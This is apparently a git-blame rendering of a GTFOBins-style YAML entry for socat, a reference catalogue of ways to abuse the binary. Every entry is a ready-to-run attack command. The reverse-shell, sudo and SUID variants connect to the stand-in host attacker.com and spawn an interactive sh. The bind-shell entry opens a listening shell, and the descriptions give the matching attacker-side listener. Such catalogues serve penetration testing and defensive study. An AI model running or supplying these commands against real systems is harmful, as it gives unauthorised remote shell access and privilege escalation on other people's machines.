2018-05-22 22:40:27 +02:00
|
|
|
---
|
|
|
|
functions:
|
2018-05-25 15:30:02 +02:00
|
|
|
reverse-shell-interactive:
|
2018-07-22 16:22:03 +02:00
|
|
|
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
2018-07-16 15:01:50 +02:00
|
|
|
code: |
|
|
|
|
RHOST=attacker.com
|
|
|
|
RPORT=12345
|
|
|
|
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
2018-05-25 15:30:02 +02:00
|
|
|
bind-shell-interactive:
|
2018-07-22 16:22:03 +02:00
|
|
|
- description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.
|
2018-07-16 15:01:50 +02:00
|
|
|
code: |
|
|
|
|
LPORT=12345
|
|
|
|
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
|
2018-07-22 16:49:15 +02:00
|
|
|
sudo-enabled:
|
|
|
|
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
|
|
|
code: |
|
|
|
|
RHOST=attacker.com
|
|
|
|
RPORT=12345
|
|
|
|
sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
|
|
|
suid-limited:
|
|
|
|
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
|
|
|
code: |
|
|
|
|
RHOST=attacker.com
|
|
|
|
RPORT=12345
|
|
|
|
./socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
2018-05-25 01:10:39 +02:00
|
|
|
---
|